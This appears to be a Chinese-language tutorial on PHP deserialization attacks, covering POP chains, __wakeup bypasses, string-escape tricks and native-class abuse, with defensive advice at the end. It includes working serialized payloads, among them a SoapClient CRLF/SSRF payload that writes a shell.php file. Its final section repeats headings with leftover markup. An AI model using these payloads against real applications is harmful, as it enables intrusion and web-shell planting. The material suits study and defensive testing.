PHP反序列化进阶：POP链构造与高级利用技术<\/h1>

魔术方法详解<\/h2>

PHP反序列化攻击的核心在于利用魔术方法，以下是关键魔术方法及其触发条件：<\/p>

__invoke()<\/strong>: 当尝试以调用函数的方式调用对象时触发，如 $a()<\/code><\/li>
__construct()<\/strong>: 类创建新对象时回调，new a()<\/code>时触发（注意：unserialize()<\/code>时不自动调用）<\/li>
__destruct()<\/strong>: 对象销毁或反序列化时调用，通常作为攻击链的入口点<\/li>
__wakeup()<\/strong>: unserialize()<\/code>时自动调用<\/li>
__sleep()<\/strong>: serialize()<\/code>前调用<\/li>
__toString()<\/strong>: 类被当作字符串使用时触发（如echo $obj<\/code>、strtolower($obj)<\/code>等）<\/li>
__set()<\/strong>: 给不可访问或不存在的属性赋值时调用<\/li>
__get()<\/strong>: 读取不可访问或不存在的属性时调用<\/li>
__call()<\/strong>: 调用对象中不可访问的方法时执行<\/li>
__isset()<\/strong>: 对不可访问属性调用isset()<\/code>或empty()<\/code>时触发<\/li>

__unset()<\/strong>: 对不可访问属性调用unset()<\/code>时触发<\/li>
<\/ol>
__wakeup()绕过技术<\/h2>
CVE-2016-7124漏洞利用<\/h3>
影响版本<\/strong>:<\/p>

PHP5 < 5.6.25<\/li>
PHP7 < 7.0.10<\/li>
<\/ul>
绕过原理<\/strong>:

当对象属性数量大于实际数量时，__wakeup()<\/code>不会触发<\/p>
示例<\/strong>:<\/p>
class<\/span> ctf<\/span> {
<\/span><\/span>    public<\/span> $h1;
<\/span><\/span>    public<\/span> $h2;
<\/span><\/span>    public<\/span> function<\/span> __wakeup() { echo<\/span> "wakeup<br>"<\/span>; }
<\/span><\/span>    public<\/span> function<\/span> __destruct() { echo<\/span> "destruct<br>"<\/span>; }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>正常payload<\/strong>:

?ctf=O:3:"ctf":2:{s:2:"h1";N;s:2:"h2";N;}<\/code><\/p>
绕过payload<\/strong>（修改属性数量）:

?ctf=O:3:"ctf":3:{s:2:"h1";N;s:2:"h2";N;}<\/code><\/p>
PHP引用赋值绕过<\/h3>
利用PHP的引用赋值特性&<\/code>可以修改关键属性：<\/p>
class<\/span> ctf<\/span> {
<\/span><\/span>    public<\/span> $key;
<\/span><\/span>    public<\/span> function<\/span> __destruct() {
<\/span><\/span>        $this-><\/span>key<\/span> =<\/span> False<\/span>;
<\/span><\/span>        if<\/span>(!<\/span>isset<\/span>($this-><\/span>wakeup<\/span>) ||<\/span> !<\/span>$this-><\/span>wakeup<\/span>) {
<\/span><\/span>            echo<\/span> "You get it!"<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    public<\/span> function<\/span> __wakeup() {
<\/span><\/span>        $this-><\/span>wakeup<\/span> =<\/span> True<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方法<\/strong>:

将$this->wakeup<\/code>和$this->key<\/code>引用关联：<\/p>
$a =<\/span> new<\/span> ctf<\/span>();
<\/span><\/span>$a-><\/span>key<\/span> =<\/span> &<\/span>$a-><\/span>wakeup<\/span>;
<\/span><\/span>echo<\/span> serialize<\/span>($a);
<\/span><\/span>\/\/ 输出: O:3:"ctf":2:{s:3:"key";N;s:6:"wakeup";R:2;}
<\/span><\/span><\/span><\/code><\/pre>PHP GC回收机制利用<\/h2>
基本原理<\/h3>

PHP通过引用计数和回收周期管理内存<\/li>
当变量被设置为NULL或没有指针指向时，会变成垃圾等待回收<\/li>
对象被回收时会调用__destruct()<\/code><\/li>
<\/ul>
利用场景<\/h3>

异常处理触发析构<\/strong>:<\/li>
<\/ol>
a<\/span>:<\/span>2<\/span>:<\/span>{s<\/span>:<\/span>1<\/span>:<\/span>"a"<\/span>;O<\/span>:<\/span>1<\/span>:<\/span>"B"<\/span>:<\/span>0<\/span>:<\/span>{}s<\/span>:<\/span>1<\/span>:<\/span>"a"<\/span>;N<\/span>;}
<\/span><\/span><\/code><\/pre>通过重复键名使前一个对象被销毁<\/p>

fast destruct技术<\/strong>:<\/li>
<\/ol>

在unserialize过程中如果格式有误会提前触发析构<\/li>
方法：破坏字符串格式（如去掉最后的大括号）<\/li>
<\/ul>
PHP issue#9618绕过<\/h3>
在特定PHP版本(7.4.x-7.4.30, 8.0.x)中，可以通过构造错误的变量名长度使反序列化在__wakeup<\/code>之前调用__destruct<\/code><\/p>
字符串逃逸技术<\/h2>
字符增多型逃逸<\/h3>
当过滤函数使字符增多时，可以利用长度计算差异构造payload：<\/p>
示例<\/strong>:

原始序列化:

O:1:"A":2:{s:5:"test1";s:6:"xxx123";s:5:"test2";s:5:"admin";}<\/code><\/p>
被替换后:

O:1:"A":2:{s:5:"test1";s:61:"O:1:"A":2:{s:5:"test1";s:6:"yyyyyy123";s:5:"test2";s:5:"admin";}";s:5:"test2";s:6:"hacker";}<\/code><\/p>
构造payload使123"<\/code>后的内容逃逸:

xxxxxxxxxxxxxxxxxxxxxxxxxxx";s:5:"test2";s:5:"admin";}<\/code><\/p>
字符减少型逃逸<\/h3>
当过滤使字符减少时，需要计算吸收的字符量：<\/p>
目标<\/strong>:

O:1:"A":3:{s:5:"test1";s:4:"xxxx";s:5:"test2";s:3:"123";s:5:"test3";s:5:"admin";}<\/code><\/p>
需要吸收:

";s:5:"test2";s:49:"<\/code> (20位)<\/p>
原生类利用<\/h2>
C开头原生类<\/h3>
可用于绕过\/^[Oa]:[\/d]+\/<\/code>过滤：<\/p>
C<\/span>:<\/span>11<\/span>:<\/span>"ArrayObject"<\/span>:<\/span>60<\/span>:<\/span>{x<\/span>:<\/span>i<\/span>:<\/span>0<\/span>;O<\/span>:<\/span>7<\/span>:<\/span>"ctfshow"<\/span>:<\/span>1<\/span>:<\/span>{s<\/span>:<\/span>7<\/span>:<\/span>"ctfshow"<\/span>;s<\/span>:<\/span>6<\/span>:<\/span>"whoami"<\/span>;};m<\/span>:<\/span>a<\/span>:<\/span>0<\/span>:<\/span>{}}
<\/span><\/span><\/code><\/pre>文件操作类<\/h3>


遍历目录<\/strong>:<\/p>

DirectoryIterator<\/code><\/li>
FilesystemIterator<\/code><\/li>
GlobIterator<\/code>

(注意：这些类不能反序列化)<\/li>
<\/ul>
<\/li>

读取文件<\/strong>:<\/p>

SplFileObject<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
XSS利用<\/h3>
使用Error<\/code>和Exception<\/code>原生类进行XSS攻击<\/p>
SSRF利用<\/h3>
利用SoapClient<\/code>的__call<\/code>方法进行SSRF:<\/p>
条件<\/strong>:<\/p>

启用soap扩展<\/li>
调用不存在的方法触发__call()<\/code><\/li>
仅限于http\/https协议<\/li>
<\/ol>
CRLF攻击示例<\/strong>:<\/p>
O<\/span>:<\/span>10<\/span>:<\/span>"SoapClient"<\/span>:<\/span>5<\/span>:<\/span>{
<\/span><\/span>    s<\/span>:<\/span>3<\/span>:<\/span>"uri"<\/span>;s<\/span>:<\/span>4<\/span>:<\/span>"aaab"<\/span>;
<\/span><\/span>    s<\/span>:<\/span>8<\/span>:<\/span>"location"<\/span>;s<\/span>:<\/span>25<\/span>:<\/span>"http:\/\/127.0.0.1\/flag.php"<\/span>;
<\/span><\/span>    s<\/span>:<\/span>15<\/span>:<\/span>"_stream_context"<\/span>;i<\/span>:<\/span>0<\/span>;
<\/span><\/span>    s<\/span>:<\/span>11<\/span>:<\/span>"_user_agent"<\/span>;s<\/span>:<\/span>178<\/span>:<\/span>"aaa%0d%0aContent-Type: application\/x-www-form-urlencoded%0d%0aX-Forwarded-For: 127.0.0.1%0d%0aCookie: aaaa=ssss%0d%0aContent-Length: 55%0d%0a%0d%0aa=file_put_contents("<\/span>shell<\/span>.<\/span>php<\/span>", "<\/span><?<\/span>php<\/span> phpinfo<\/span>();?><\/span>");";
<\/span><\/span><\/span>    s:13:"_soap_version";i:1;
<\/span><\/span><\/span>}
<\/span><\/span><\/span><\/code><\/pre>其他特性<\/h2>


十六进制表示法<\/strong>:

使用S<\/code>表示十六进制字符串，如s:5:"test"<\/code>可写为S:5:"\74\65\73\74"<\/code><\/p>
<\/li>

类名大小写不敏感<\/strong>:

PHP反序列化时类名不区分大小写<\/p>
<\/li>

类内方法调用<\/strong>:<\/p>

静态调用: ClassName::method()<\/code><\/li>
动态调用: $obj->method()<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

避免反序列化用户输入<\/li>
及时更新PHP版本修复已知漏洞<\/li>
对序列化数据进行签名验证<\/li>
使用allowed_classes<\/code>限制可反序列化的类<\/li>
对魔术方法进行安全审计<\/li>
<\/ol>
以上技术可组合使用构造复杂的POP链，在实际渗透测试中需要根据目标环境灵活应用。<\/p>

PHP反序列化进阶：POP链构造与高级利用技术<\/h1>

__wakeup()绕过技术<\/h2>

PHP GC回收机制利用<\/h2>

PHP issue#9618绕过<\/h3>
在特定PHP版本(7.4.x-7.4.30, 8.0.x)中，可以通过构造错误的变量名长度使反序列化在`wakeup<\/code>之前调用destruct<\/code><\/p>`

XSS利用<\/h3>
使用`Error<\/code>和Exception<\/code>原生类进行XSS攻击<\/p>`

PHP反序列化进阶：POP链构造与高级利用技术<\/h1>

__wakeup()绕过技术<\/h2>

PHP GC回收机制利用<\/h2>

PHP issue#9618绕过<\/h3> 在特定PHP版本(7.4.x-7.4.30, 8.0.x)中，可以通过构造错误的变量名长度使反序列化在__wakeup<\/code>之前调用__destruct<\/code><\/p>

XSS利用<\/h3> 使用Error<\/code>和Exception<\/code>原生类进行XSS攻击<\/p>

PHP issue#9618绕过<\/h3>
在特定PHP版本(7.4.x-7.4.30, 8.0.x)中，可以通过构造错误的变量名长度使反序列化在`wakeup<\/code>之前调用destruct<\/code><\/p>`

XSS利用<\/h3>
使用`Error<\/code>和Exception<\/code>原生类进行XSS攻击<\/p>`